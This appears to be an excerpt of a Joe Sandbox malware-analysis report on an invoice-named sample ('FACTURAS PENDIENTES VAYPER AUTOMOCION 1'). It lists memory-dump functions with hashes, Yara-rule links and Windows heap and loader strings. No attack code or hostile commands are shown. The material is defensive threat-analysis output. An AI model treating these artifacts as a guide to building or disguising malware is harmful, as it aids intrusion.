                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-4253913091
                                • Opcode ID: 904821a76b72c8d5bd2aaeb063595d51f6e4278889a1d67daace0f897da45a0f
                                • Instruction ID: 342ff69bd6ceb92e8e65b2278c546c7889bb33dfa45d7aa9b313bed36a86e272
                                • Opcode Fuzzy Hash: 904821a76b72c8d5bd2aaeb063595d51f6e4278889a1d67daace0f897da45a0f
                                • Instruction Fuzzy Hash: 72F1AE74A00605EFEB19CF68C890F6AB7F5FF94344F1091A9E8459B395DB31EA81CB90
                                Function 3250F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                Download Yara Rule
                                Strings
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 325502BD
                                • RTL: Re-Waiting, xrefs: 3255031E
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 325502E7
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                • Opcode ID: cde5d8eb6c8671af8e46602eabd1cccd3ee1f5601b0617fed429fb452d31ce94
                                • Instruction ID: d18105a63272b40c66d287ef8f58f59d3a60c7a80c800b5ae8ec050fa613a1de
                                • Opcode Fuzzy Hash: cde5d8eb6c8671af8e46602eabd1cccd3ee1f5601b0617fed429fb452d31ce94
                                • Instruction Fuzzy Hash: D0E1C0756087419FE715CF28C880B1ABBE0BF88364F604A5EF495CB2E1DB74EA45CB42
                                Function 325BB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 579532dda226d5a5f49b11eda65bccf5517074c86628e2246aa6620ec84f758c
                                • Instruction ID: 38505dd6ce1b7d8332c85a8066426ee1f6aa3d17c5de81d54067afd6e816bbfb
                                • Opcode Fuzzy Hash: 579532dda226d5a5f49b11eda65bccf5517074c86628e2246aa6620ec84f758c
                                • Instruction Fuzzy Hash: EDF10676E006118BDF08CF69C99167EFFF6AF98200B59416DD856DB380EAB4EA41CB50
                                Function 325911A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: This is located in the %s field of the heap header.$ -M2`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                • API String ID: 0-1754937585
                                • Opcode ID: 97f08afef848e457dbc45efe5c7a1e3e46310ba46ed28f259aae480ebee63909
                                • Instruction ID: 803f873d586b35b0e4d3bb37ee5fcd810fc8a8d731fb6d0a11ea17a986effce5
                                • Opcode Fuzzy Hash: 97f08afef848e457dbc45efe5c7a1e3e46310ba46ed28f259aae480ebee63909
                                • Instruction Fuzzy Hash: 2031F435101260EFEB05EB99C880F9677E8FF04B65F508499F842DB291DB70EE40DEA5
                                Function 324D76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                • API String ID: 0-3061284088
                                • Opcode ID: 707d0e88265372a5d9522fb521a0d63444965c612d4b7e93d14c870bebad4bf2
                                • Instruction ID: 77d74229d5c8ed434f149dda5479f8657fcf735338769bc8fcee7dcf8c2b7104
                                • Opcode Fuzzy Hash: 707d0e88265372a5d9522fb521a0d63444965c612d4b7e93d14c870bebad4bf2
                                • Instruction Fuzzy Hash: 9701F7374066C0DEE61A9728D529F62BBE4EF42B31F2440DDF5448BA52CEB4A981CA70
                                Function 324F70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: 76bbda33ae143197a2b00f04051855ff8dda6cec247bbd2fb4bb3f74dcb2a354
                                • Instruction ID: 5d53639b9f6d2326666e77174a7ca9befacf66680302a17007f8eda785e0c3bc
                                • Opcode Fuzzy Hash: 76bbda33ae143197a2b00f04051855ff8dda6cec247bbd2fb4bb3f74dcb2a354
                                • Instruction Fuzzy Hash: E213BF74A00755AFEB15CF68C9807A9BBF1FF88304F148159D845AF381DB76A992CF90
                                Function 324EB6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\UK2
                                • API String ID: 0-235712404
                                • Opcode ID: 5cae747d93c19462a1e14aedbb28db55c961295d8557d9b3df59978da163ff27
                                • Instruction ID: 613eef19373aacf2e258b32dbc1f41697f452c83cc8102a9643d26a788751171
                                • Opcode Fuzzy Hash: 5cae747d93c19462a1e14aedbb28db55c961295d8557d9b3df59978da163ff27
                                • Instruction Fuzzy Hash: 51B1DF76A06744AFEB15CF65C880B9DF7B5BF54368F644529E852EB7A0DB30EA40CB00
                                Function 324EB440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\UK2${
                                • API String ID: 0-1304081954
                                • Opcode ID: 3f9a65203a88131f97b4738b07c075534fed209f695499ff898d79006140ae28
                                • Instruction ID: 6d8d332f88385d1e556483e347fb327fdc006b6ecc986d8a298f04881de327b0
                                • Opcode Fuzzy Hash: 3f9a65203a88131f97b4738b07c075534fed209f695499ff898d79006140ae28
                                • Instruction Fuzzy Hash: 6A91F3B5902309DFFB15CF64C940B9DB7B0FF10769F604195E852AB3A0DB789A81CB91
                                Function 324DF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                • API String ID: 0-2586055223
                                • Opcode ID: 47927b866ba19bb8f75bbc5a95ddc3870583236c681a59f6962d7877f1b3b748
                                • Instruction ID: ec6c01214aa2de834866cd5101da27e41693be20015727f95a3767a5e92ba7f6
                                • Opcode Fuzzy Hash: 47927b866ba19bb8f75bbc5a95ddc3870583236c681a59f6962d7877f1b3b748
                                • Instruction Fuzzy Hash: 7F613776245780AFE312CF24C864F5B7BE8FF84B54F050458FA548B292DB74DA42CBA1
                                Function 324D9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                • API String ID: 0-1391187441
                                • Opcode ID: 01054357650b9372566e2e51b640e0de95718b73c13d4591c6ccf514238576f1
                                • Instruction ID: 6d417f8f9685f179181569e0b052ce647ebea92dc917efa3cb04f1bd9f62a238
                                • Opcode Fuzzy Hash: 01054357650b9372566e2e51b640e0de95718b73c13d4591c6ccf514238576f1
                                • Instruction Fuzzy Hash: F731C136A01654EFEB02CB49CC94F9EB7B8EF45764F144095E914EB292DB70EE40CA60
                                Function 32521270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$BuildLabEx$EQ2$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 0-22242143
                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                • Instruction ID: 465b639d055e42e5a969a19c44ee3131c38859e74db0bbe7dd4fe89a725e8632
                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                • Instruction Fuzzy Hash: CE318D76900318BFDB119FA5CD40EDFBBB9EB84B54F508425E914A71E0EB70DB058BA0
                                Function 324E7152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 3ca11a42066165e10bd6eb77fa90ea7b9ef1ced62f90505a029b4bd2f9667fb8
                                • Instruction ID: f1a55a46eb31524e1bd6ea3ce36fd352325b9156d7249ab76e965a074ff1f416
                                • Opcode Fuzzy Hash: 3ca11a42066165e10bd6eb77fa90ea7b9ef1ced62f90505a029b4bd2f9667fb8
                                • Instruction Fuzzy Hash: 8451B035A00705ABFB0ACF64CA44B6DFBB4BF44766F108169E91297390DFB49A41CB80
                                Function 32573A78 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                • API String ID: 0-1168191160
                                • Opcode ID: 4a7868f7e7942b06f2e629469080a935439ed4d7cfaddc962a8b8531faf48437
                                • Instruction ID: 85ba3650ae1efd0f3aeba1a9e0480a9e6375d00a8b9461b68d3563c4791d226c
                                • Opcode Fuzzy Hash: 4a7868f7e7942b06f2e629469080a935439ed4d7cfaddc962a8b8531faf48437
                                • Instruction Fuzzy Hash: ABF1C3B5A402289BDB20DF18CC80BD9B7B5EF54364F5480E9EA08AB240EB759FC5CF55
                                Function 324E1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                Download Yara Rule
                                Strings
                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 324E1728
                                • HEAP: , xrefs: 324E1596
                                • HEAP[%wZ]: , xrefs: 324E1712
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: 797ba230c142a596aafd46c5c69e28a14c0f705dc2849f3e77e42e48a3e4d34d
                                • Instruction ID: c3f5a62b2f8ac844caaba2c6dab412952a04ee6d65f5ba4711ecac7ffc0628c0
                                • Opcode Fuzzy Hash: 797ba230c142a596aafd46c5c69e28a14c0f705dc2849f3e77e42e48a3e4d34d
                                • Instruction Fuzzy Hash: 19E1D074A047419BEB19CF28C491BBAFBF1AF48B05F14885EE99ACB345DB34E941CB50
                                Function 324EBAA0 Relevance: 4.1, Strings: 3, Instructions: 361COMMON
                                Download Yara Rule
                                Strings
                                • 'LDR: %s(), invalid image format of MUI file , xrefs: 32543AB4
                                • {, xrefs: 32543ABD
                                • LdrpLoadResourceFromAlternativeModule, xrefs: 32543AAF
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                • API String ID: 0-1697150599
                                • Opcode ID: e43afc8585bba7a9cb0f2c6cca1ccd746546a0e359e7b695ef523d6712aa8885
                                • Instruction ID: 05bb99d247978352d6b71e5832fb1a0539f7de34e11c619958dac7b1094de623
                                • Opcode Fuzzy Hash: e43afc8585bba7a9cb0f2c6cca1ccd746546a0e359e7b695ef523d6712aa8885
                                • Instruction Fuzzy Hash: D6E16A746093859BF308CF14C590B6AB7E1BF84789F51892DF9869B360DB70DA46CB82
                                Function 3256368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                • API String ID: 0-2391371766
                                • Opcode ID: 8189bb68d9de87c0a7cf787abbd670cddc47c8fd4419e8b309d352cd001fcc6a
                                • Instruction ID: 0dd3acf2942308ef77f80ed00912814e46bc21f800ec97734d3bf24030bd2cc6
                                • Opcode Fuzzy Hash: 8189bb68d9de87c0a7cf787abbd670cddc47c8fd4419e8b309d352cd001fcc6a
                                • Instruction Fuzzy Hash: 1EB1E1B5605341BFE301DF54C880F6BBBE8EB54B68F405829FA40E7280DB71EA44CB92
                                Function 32583B60 Relevance: 4.0, Strings: 3, Instructions: 280COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                • API String ID: 0-1146358195
                                • Opcode ID: a3ffb10d161ab9e9a0eb26c5c1a3238f1521034e0982285557eecb2c04959356
                                • Instruction ID: 761de641f23dc1aa49eb25252a4d13bd0fac91c5d47bb4fde99bcd02258c2114
                                • Opcode Fuzzy Hash: a3ffb10d161ab9e9a0eb26c5c1a3238f1521034e0982285557eecb2c04959356
                                • Instruction Fuzzy Hash: 14A17D72609355AFD711DF24C880B5BBBE8FF98758F40092DB98897290DBB0DE05CB92
                                Function 325736EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                • API String ID: 0-318774311
                                • Opcode ID: 1d3a9621f580bd7bf9884072dc3cfb82d7e951ce54ac314d9a2f5fed71cce93f
                                • Instruction ID: eebc45473f010092e2bfe0831ce5c90b16e274fe05bf047a84eccc172a56d71f
                                • Opcode Fuzzy Hash: 1d3a9621f580bd7bf9884072dc3cfb82d7e951ce54ac314d9a2f5fed71cce93f
                                • Instruction Fuzzy Hash: 6D819BB5649341AFE311CF18C980B6ABBE8EF95764F40096DFD909B390EB74DA04CB52
                                Function 32567410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                • API String ID: 0-3870751728
                                • Opcode ID: ebff3e425114b047c8fb50ae3da84fbdc42eafe42e179ddb760ef31502f5225c
                                • Instruction ID: 8d01296d8e3d8d07a6249dd049cc846eb24dc5acdbcc0a78bd071fe585790219
                                • Opcode Fuzzy Hash: ebff3e425114b047c8fb50ae3da84fbdc42eafe42e179ddb760ef31502f5225c
                                • Instruction Fuzzy Hash: 2B916DB4E002159FEB14CF69C480BADBBF1FF88318F24916AD905AB391EB759A41CF54
                                Function 3251909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: %$&$@
                                • API String ID: 0-1537733988
                                • Opcode ID: 53fb052b6ed6e5cb289d312e9163659dec5bc4b38a007e18a3ef79966f9e879e
                                • Instruction ID: 3b1d636523d9a96bae6b5b784698a964bce62e615bb777640d099d634c6530a1
                                • Opcode Fuzzy Hash: 53fb052b6ed6e5cb289d312e9163659dec5bc4b38a007e18a3ef79966f9e879e
                                • Instruction Fuzzy Hash: EA71C2745093419FEB08CF20C580A5BBBE5BFC4758F50491EE8A747290CB71EB45CB92
                                Function 325BB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                Download Yara Rule
                                Strings
                                • TargetNtPath, xrefs: 325BB82F
                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 325BB82A
                                • GlobalizationUserSettings, xrefs: 325BB834
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                • API String ID: 0-505981995
                                • Opcode ID: 80b8fbca0b169abc0f8bee055df9dd138f8ac3c73bad3849869b27b670dddcbe
                                • Instruction ID: f7c68078f9547620216e7b8c1cc06ff6f2779ea39429b34c048d026222d9558c
                                • Opcode Fuzzy Hash: 80b8fbca0b169abc0f8bee055df9dd138f8ac3c73bad3849869b27b670dddcbe
                                • Instruction Fuzzy Hash: A2618F72D41229ABDF21DF54DC88BDAB7B8AF48754F4101E9A908A7250DBB49F84CF90
                                Function 324DF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                Download Yara Rule
                                Strings
                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3253E6C6
                                • HEAP: , xrefs: 3253E6B3
                                • HEAP[%wZ]: , xrefs: 3253E6A6
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
